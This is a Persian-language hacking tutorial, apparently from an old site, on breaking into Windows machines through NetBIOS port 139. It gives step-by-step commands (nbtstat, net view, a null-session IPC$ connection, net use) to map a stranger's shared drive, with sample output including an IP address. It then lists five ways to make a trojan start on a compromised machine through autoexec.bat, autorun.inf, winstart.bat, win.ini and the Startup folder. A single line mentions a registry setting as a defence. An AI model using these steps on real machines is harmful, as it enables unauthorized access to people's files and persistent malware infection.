صحبت با پورت 139 یا همون نت
بايوس
نت بایوس پورت معروف مایکروسافت
برای اشتراک گذاری فایل ها یا سخت افزار هاست
.
برای صحبت با پورت ها از 2 نرم
افزار یا از 2 برنامه استفاده می کردیم اما این یه نمه فرق
داره اینم صحبت با پورت 139
تو کامند پرومت بنویسین
nbtstat -A ip address
به جای آی پی آدرس ،آی پی سرور یا طرف رو بزارین
اگه ارور داد که بی خیال اگه نداد این رو می نویسه
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
HOME-TU6U0AV86Y<00> UNIQUE Registered
MSHOME <00> GROUP Registered
HOME-TU6U0AV86Y<20> UNIQUE Registered
MSHOME <1E> GROUP Registered
MAC Address = 00-53-45-00-00-00
بعد این نوبت به مرحله بعدی می رسه راستی اگه <20>رو
نداشت نمی تونین استفاده کنین!؟
این رو بنویسین
net view \\ip address
خب ای پی رو جایگزین کنین
حالا اگه ارور داد که اینو بنویسین
net use \\ip address\IPC$ "" /user:""
حالا دوباره دستور قبلی رو تکرار کنین
حالا اینا رو می نویسه که لیست اشتراکی هاست
Shared resources at \\217.218.84.29
Share name Type Used as Comment
------------------------------------------------
Printer Print Acrobat PDFWriter
Printer2 Print Acrobat Distiller
SharedDocs Disk
The command completed successfully.
خب حالا ما می دونیم که هارد طرف یه درایوی اشتراک هست پس
می نویسیم
net use Drive name for you: \\ip address\SharedDocs
آخری همون اشتراکی هست
اون درایو هم درایوی هست که تو مای کامپیوتر شما نمایش
داده می شه
آخرشم می نویسه
The commend completed successfully.
حالا هر کاری که دلتون می خواد می تونین تو مای کامپیوتر
خودتون بکنین برای حذفذهم اینو بنویسین
net use /delet Drive name for you:
حالا برای غیر فعال کردن نت بایوس این کار رو انجام بدین
Start > Run > regedit > HKEY_LOCAL_MACHINE >
HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet >
Control >
LSA > RestrictAnonymous=2
یا می تونین یه فایروال بزارین روش!؟
----------
اگه به درايو C کامپيوتر مقابل دسترسي داريد، يک سطر به
فايل autoexec.bat اضافه کنيد که نام و مسير فايل اجرايي
را در اون سطر بنويسيد. مثلا اگه اسم تروجان ali.exe باشد
و در مسير d:\newfolder باشد، سطري که اضافه ميکنيم به
صورت زير است:
d:\newfolder\ali.exe
در اين حالت به محض اولين restart کامپيوتر، تروجان اجرا
خواهد شد.
۲- اگه به درايو C دسترسي داريد، ميتونيد فايلي به اسم
Autorun.inf ايجاد کنيد و دستورات زير را بنويسيد سطر
آخر مطابق با همان تروجان فرضي که در مثال قبل گفتيم،
نوشته شده است، اونو با توجه به اسم تروجان و مسير اون
تغيير دهيد:
[autorun]
open=d:\newfolder\ali.exe
۳- اگه به فولدر ويندوز دسترسي داريد، ميتونيد يک سطر مثل
همان مثال قبل ولي براي فايل winstart.bat اجرا کنيد. در
اين حالت هم به محض restart اجرا خواهد شد.
۴- اگه به فولدر ويندوز دسترسي داريد، در فايل win.ini و
بعد از قسمتي که [windows] نوشته، اين سطر رو اضافه کنيد:
run=d:\newfolder\ali.exe
۵- اگه به فولدر ويندوز دسترسي داريد، ميتونيد تروجان رو
به فولدر Start Menu\Startup اضافه کنيد. در اين حالت
نيازي به ويرايش هيچ فايل ديگري نيست
<<<
Back |